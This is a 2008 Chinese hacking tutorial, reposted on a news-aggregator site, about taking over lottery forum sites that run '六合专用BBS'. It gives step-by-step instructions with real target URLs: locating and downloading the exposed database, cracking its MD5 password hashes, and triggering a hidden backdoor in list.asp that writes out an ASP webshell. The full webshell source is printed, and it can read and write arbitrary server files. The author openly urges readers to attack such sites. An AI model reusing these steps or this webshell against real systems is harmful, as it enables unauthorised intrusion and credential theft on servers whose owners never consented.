分享
 
 
 

webshell给六合彩网站毁灭性的打击

王朝html/css/js·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

先在 baidu 搜 “六合专用BBS v1.0”当然你搜 v2.0 、v3.0 都可以!“找到相关网页约23,000篇,用时0.017秒”我们看一下非常多的,随便进一个吧。

http://www.ky8888.com/bbs/list.asp

找到Domain2.2.exe,的 SearchPage.txt,

在里面加查找页 /fdnews.asp/bbs/fdnews.asp,好了现在我们来扫扫看!哇,好多啊,这个就是数据库了,我们用网际快车 把他下下来,昏 ,打开要密码,就密码这个东西啦: newbbs.cn88 ,现在 帐号、密码,就尽收眼底了,嘿嘿!~~现在把 md5 加密的东西放 MD5Crack 2.3 去跑吧,看你运气咯!~

不过我们今天要的不是它的密码,而是webshell。大家跟我来,马上会有惊人的发现。打开数据库的zl表,找到idto 的字段,怎么了发现什么了吗?这个好象是一个网页哦,嘿嘿!~~

代码如下:

<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title></title>

<meta name="GENERATOR" content="Microsoft FrontPage 3.0">

</head>

<body bgcolor="#FFFFFF">

<%

Function GetPP

dim s

s=Request.ServerVariables("path_translated")

GetPP=left(s,instrrev(s,"\",len(s)))

End function

MODE=Request("MODE")

sPP=Request("PP")

if sPP="" then sPP=GetPP

if right(sPP,1)<>"\" then sPP=sPP&"\"

Response.Write "<b>Index of "&sPP& "</b>"

%>

<%fname=request("fname")

if fname<>"" then

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

if request("save")="" then

Set objCountFile = objFSO.OpenTextFile(fname,1,True)

If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll

else

fdata=request("fdata")

Set objCountFile=objFSO.CreateTextFile(fname,True)

objCountFile.Write fdata

end if

objCountFile.Close

Set objCountFile=Nothing

Set objFSO = Nothing

end if

%>

<form method=POST>

<table border=0 cellspacing=0 bgcolor=#000000>

<tr>

<td><table border=0 cellpadding=10 cellspacing=0 bgcolor=#FFFFFF>

<tr>

<td><table bordercolor=#0080FF bgcolor=#FFFFD0 border=1>

<tr>

<td bgcolor="#0080FF"><font color="#FFFFFF">change:<%=fname%></font></td>

<tr>

<td><input type="submit" value="ok" name="save"><input type="reset" value="reset"><br>

<textarea rows="22" name="fdata" cols="100"><%=fdata%></textarea></td>

</tr>

</table>

</td>

</tr>

</table>

</td>

</tr>

</table>

</form>

</body>

</html>

再认真看看,其实这就是一个webshell,所有的六合彩专用论坛的数据库里面都有。它出生的时间可能比海洋顶端2003 还要早,是asp木马界的鼻祖了。

既然数据库的文件名是asp的后缀,而里面又自带一个asp木马,我们来试试直接打开这个数据库地址,

http://www.ky8888.com/bbs/fdnews.asp昏,可以看出木马里面的asp 代码并没有执行,也就是说我们拿了一只死马。

这就是我12月25号的号的发现,拿到这个之后就和兄弟 ☆罹天烬☆ 讨论过(czy也给予了帮助),开始认为只要拿到网站在服务器上的绝对路径就可以在本地提交,写入我们自己的木马,但是实验却一直没有成功。

虽然我手里有一个这样的论坛,但是有几个重要的页面丢失了,一时也看不出一个所以然来,这样一拖就是十几天,

前天我再把这个论坛的代码拿出来看,在list.asp 里面发现一段重要的东西.

<%

if len(page)>6 then

if md5(md5(page))="8f9fc56c3d174202" then

dim fname

fname=""&sPP&"pags.asp"

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

Set objCountFile=objFSO.CreateTextFile(fname,True)

objCountFile.Write ""& idto &""

objCountFile.Close

Set objCountFile=Nothing

Set objFSO = Nothing

response.write "SORRY <br>"

response.write "ID?????"

response.end

end if%>

注意到了吗?""& idto &"" 这里的idto 不就是数据库里面放asp木马的字段吗?嘿嘿,那么上面的pags.asp,就应该是写入的文件名咯?我们来试试看,到底是不是这样的!

提交:http://www.ky8888.com/bbs/pags.asp

看到没有这个古老的asp木马终于显身了,首先它可以看到网站在服务器上的绝对路径,第二还可以写入文件。有人看到这个木马很郁闷,因为它根本没有写入文件的路径的设置表单,是不是我们提交的数据库,都进了数据库了呢?

来看看原代码,这一句 Set objCountFile = objFSO.OpenTextFile(fname,1,True)

看这里是写入了文件fname, 而不是数据库,我们先要请求文件fname 写入的路径,在ie 提交:http://www.ky8888.com/bbs/pags.asp?fname=D:\ky8888\bbs\haotian.asp再填内容 ,嘿嘿? ok 了 !,这样D:\ky8888\bbs\haotian.asp 就是我们新建的文件了。

因为这个网站空间不支持fso,所以我直接把数据库里面的木马复制到朋友的asp空间去演示,看是不是写入文件成功了,嘿嘿!~~http://lvhuana.somee.com/haotian.asp?id=1

这样简单就拿到了webshell,不过我试了另外几个六合彩网站却没有发现这个pags.asp,看来这个里面还有东西要挖一挖。可能要等到拿了完整的 六合专用BBS 的代码之后问题就都解决了。

本文只是起到抛砖引玉的作用,还是那句话期望着大家一起走到打击六合彩网站的道路上来!消减它们,国家的害虫……

我在写本文的同时,也有很多人和我说,现在地下足彩也很泛滥,所以我专门联系了一位国内的黑足彩

高手,他将在近期出一篇关于消减足彩网站的文章。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有